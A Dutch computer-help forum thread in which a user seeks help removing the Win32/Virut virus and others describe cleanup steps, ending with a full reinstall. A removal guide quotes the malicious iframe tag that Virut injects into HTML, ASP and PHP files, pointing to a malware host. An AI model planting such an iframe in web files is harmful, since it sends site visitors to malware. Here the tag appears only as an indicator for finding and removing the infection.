Win32/virut

Status
Niet open voor verdere reacties.
J

jeppah

Gebruiker
Lid geworden
9 apr 2009
Berichten
19
Sinds kort is mijn computer geinfecteerd met het Win32/virut virus.
Deze hecht zich aan veel .exe files waardoor ze onbruikbaar worden:(
Ook las ik op internet dat er een 'remote attacker' toegang heeft tot mijn computer, maar daar heb ik tot nu toe nog niks van gemerkt:)
Na een complete scan van AVG, leek het probleem weg te zijn. Er was maar 1 programma'tje dat ik opnieuw moest installeren, maar daar had ik de CD nog van.
Toch bleven er nog waarschuwingen van AVG komen in de map C:/WINDOWS/system32/
hier werden dan .exe bestanden geinfecteerd gevonden, maar hij kon ze niet herstellen.
Sinds kort is het virus overgegaan naar bijna alle .exe bestanden in mijn Program Files, oftewel: al mijn spellen en andere programma's (Adobe Reader, Guitar Pro, Teamspeak, etc) doen het niet meer.
Mijn bureaublad is nu ongeveer de helft met blauw-witte icoontjes, omdat de .exe file weg ik gehaald (ik denk naar de quarantaine van AVG)
Het liefst zou ik een oplossing hebben, waarbij al deze programma's weer werken, want van veel heb ik de CD niet (meer).

Bij voorbaat dank, Jesper
 
Laatst bewerkt:
Nee, dat had ik al geprobeerd maar
hij vond wel heel leuk alle infecties,
maar hij kon ze niet herstellen:confused:
en als ik het nu weer probeer,
infecteerd hij de rmvirut.exe al voordat hij kan runnen...
 
Laatst bewerkt:
Ik denk dat een doorverwijzing wel even op zijn plaats is...

Maak even een Hijackthis log en laat die door een expert nakijken op een ander forum.

Lees dit bericht goed door:
http://www.nucia.nl/forum/showthread.php?t=19056

Plaats daarna je log in de juiste sectie en vermeld daar ook je probleem erbij.

Je moet je wel even registreren daar, maar dat is net als op Helpmij gratis en eenmalig.
 
Virut virus uiteindelijk verwijderd

Hallo,

Na een dag of zes ben ik eindelijk van het Virut virus af.

Stap 1
Windows Live OneCare (kun je op proef downloaden) kan dit virus verwijderen. Dat gaat niet zomaar, want als OneCare een exe heeft ontsmet, besmet een ander process die exe weer. Na een aantal dagen scans uitvoeren waren de exe bestanden schoon. Ik heb de PC ontkoppeld van internet, want hij blijft volgens telkens verbinding maken met sites met malware (zie stap 3).

Stap2
Virut maakt kopien van exe bestanden aan, eveneens besmet met Virut. Die kopien hebben als extensie exe gevolgd door een hexadecimale string (varieert telkens). OneCare ziet die wel, maar verwijdert ze niet. Die kopien heb ik met de hand verwijdert.

Stap3
Virut voegt aan het einde van html bestanden (en asp en php) een of meer iframe-regels toe (b.v. <iframe src="http://ntkrnlpa.info/cr/?i=1" height="1" width="1"></iframe>), waardoor je PC naar een site met malware gaat. Met freeware als "AutoReplace 1.0" kun je je hele harde schijf afzoeken naar deze string, en de string automatisch vervangen door een spatie. Let op: het virus heeft deze iframe statement in allerlei varianten weggeschreven, dus zoek eerst of <iframe src="http:// , en kijk dan in de gevonden bestanden hoe het hele iframe statement eruit ziet. Copy en paste dat in AutoReplace.

Stap4
AutoReplace kan geen read-only files updaten. Als je een find/replace hebt gedaan van een bepaalde string, en je doet nogmaals een find, waarbij je hetzelfde file weer vindt, dan moet je de read-only verwijderen. Ik ging naar de directory waar dit file in staat, en gaf het commando "attrib -r *.htm* /s "

Ik wens je veel succes, want dit virus is knap lastig te verwijderen!
 
heb jij alle kopien met de hand verwijderd:eek:
want bij mij vind hij zo'n 2000 infecties.
en als het virus dan weg is, waar vind ik dan mijn .exe bestanden weer,
die nu zijn verdwenen (door AVG?) ?
 
jeppah zei:
en als het virus dan weg is, waar vind ik dan mijn .exe bestanden weer,
die nu zijn verdwenen (door AVG?) ?
Klik om te vergroten...
Virut maakt allemaal kopien aan van de EXE bestanden; die heten .EXEBADJSDFA of zo. Als je geluk hebt, heeft AVG zo'n exe laten staan. En anders zou je de missende exe bestanden van je Windows installatie CD moeten worden gekopieerd, ben ik bang.

jeppah zei:
heb jij alle kopien met de hand verwijderd:eek:
want bij mij vind hij zo'n 2000 infecties.?
Klik om te vergroten...
Virut maakt niet alleen kopien van de exe bestanden, maar ook kopien van de kopien, en dus zie je in 1 directory tig versies van een en hetzelfde exe bestand. Als je de folder opent, kunt je makkelijk die tientallen versies selecteren en in 1 keer Shift-Delete doen (geen Delete, want dan gaan ze naar de prullenmand, waar de virusscanner ze waarschijnlijk weer vindt).

Jammer dat AVG die exe bestanden delete; bij Windows Live OneCare heb je de keuze tussen opschonen en deleten. Ik heb gekozen voor opschonen, en de exe bestanden weken weer goed. Ik zou ervoor kiezen om AVG tijdelijk te uninstallen, installeer OneCare op proef, verwijder Virut, uninstall OneCare, en zet er weer een gratis virusscanner op.

Succes!:thumb:
 
ok bedankt:D
maar ik denk dat ik het anders aan ga pakken,
ik maak een nieuwe partitie, daar maak ik een back-up van bestanden die ik wil bewaren (en dan denk ik geen .exe of .html)
dan formatteer ik mn overige 2 partities en herinstalleer ik windows:)
 
Dat kan ik me voorstellen. Kopieer de js , asp en php ook niet mee; kunnen ook geinfecteerd zijn :mad:

Omdat de MBR (Master Boot Record) ook besmet kan zijn is formatteren niet altijd de oplossing volgens
http://community.ca.com/blogs/securityadvisor/archive/2009/02/09/infectious-virut-on-the-loose.aspx : Formating HDD does not fully remove virus - virus must get into MBR. Full Security Wipe was necessary, then reload OS (XP) w/drivers - fun time as always, then load applications and copy data back.

Ik heb op meer plekken gelezen dat er werd geklaagd dat na een clean install Virut toch weer tevoorschijn kwam. Ik weet niet of dat aan het MBR lag of omdat ze nog b.v. een asp of html bestand van de backup hebben teruggezet.
 
formatteren

De c-schijf kan ik niet formatteren,
er staat dat hij al in gebruik is...
ik heb mijn avg weggegooid, dus ik weet nu niet zeker
of het virus er wel zit, want voor de rest heb ik er weinig last
van na de herinstallatie:)
 
Ik hoop dat je wel een andere virusscanner installeert. Als je wilt checken of je geen deel uitmaakt van een zombie-netwerk (oftewel dat iemand illegaal toegang heeft tot je computer), kun je kijken of je PC verbinding maakt met een onbekend IP adres.

Open een command prompt (via Start > Run > Cmd ) en tik in:
netstat -a -o
Dit laat alle actieve connecties zien, met het process id (PID) dat die connectie heeft.

In de Task Manager, tabblad Processes, kun je de PID zien als je met View > Select Columns > PID (Process Identifier) aanvinkt.

Zo kun je per process zien welke connectie er actief is. Als je er een process bij ziet staan waarvan je je afvraagt of dat wel goed is, kun je eventueel met reverse DNS lookup proberen op te zoeken waar dit IP adres thuishoort. Is dat in Rusland of China dan weet je genoeg...
 
Gelukt!:)

misgien niet de beste oplossing die er was, maar ik heb mijn computer geformatteerd/herinstalleerd en nu is het virus weg:D
ik moet alleen nu wel 'even' alles opnieuw installeren... (boxen, printer, scanner, MSN, IE, etc...)
maarja het is uiteindelijk wel de moeite waard:D
bedankt:thumb:
 
ach het kost even moeite maar vaak is het wel de beste oplosiing.

En zie de voordelen er ook maar weer van......;)
 
afsluiting

idd:D
mn pc is nu ook weer een stuk sneller,
ik ben wel 2 uur bezig geweest met alles opnieuw installeren enzo,
maar dat is niks vergeleken met de tijd die ik heb besteed aan het
virus bestijden:)
hardstikke bedankt voor je tips:thumb:
tip: luister ALTIJD naar je virusscanner, want ik had wsl een keer een waarschuwing genegeerd:rolleyes:
doei;)
 
AutoReplace 1.0

marcvirut zei:
Hallo,

Na een dag of zes ben ik eindelijk van het Virut virus af.

Stap 1
Windows Live OneCare (kun je op proef downloaden) kan dit virus verwijderen. Dat gaat niet zomaar, want als OneCare een exe heeft ontsmet, besmet een ander process die exe weer. Na een aantal dagen scans uitvoeren waren de exe bestanden schoon. Ik heb de PC ontkoppeld van internet, want hij blijft volgens telkens verbinding maken met sites met malware (zie stap 3).

Stap2
Virut maakt kopien van exe bestanden aan, eveneens besmet met Virut. Die kopien hebben als extensie exe gevolgd door een hexadecimale string (varieert telkens). OneCare ziet die wel, maar verwijdert ze niet. Die kopien heb ik met de hand verwijdert.

Stap3
Virut voegt aan het einde van html bestanden (en asp en php) een of meer iframe-regels toe (b.v. <iframe src="http://ntkrnlpa.info/cr/?i=1" height="1" width="1"></iframe>), waardoor je PC naar een site met malware gaat. Met freeware als "AutoReplace 1.0" kun je je hele harde schijf afzoeken naar deze string, en de string automatisch vervangen door een spatie. Let op: het virus heeft deze iframe statement in allerlei varianten weggeschreven, dus zoek eerst of <iframe src="http:// , en kijk dan in de gevonden bestanden hoe het hele iframe statement eruit ziet. Copy en paste dat in AutoReplace.

Stap4
AutoReplace kan geen read-only files updaten. Als je een find/replace hebt gedaan van een bepaalde string, en je doet nogmaals een find, waarbij je hetzelfde file weer vindt, dan moet je de read-only verwijderen. Ik ging naar de directory waar dit file in staat, en gaf het commando "attrib -r *.htm* /s "

Ik wens je veel succes, want dit virus is knap lastig te verwijderen!
Klik om te vergroten...

waar vind ik AutoReplace 1.0 kan hem nergens vinden ik heb ook dat vreselijke virus groeten willy
 
Status
Niet open voor verdere reacties.
                    Steun ons                    

Nieuwste berichten

Terug
Bovenaan Onderaan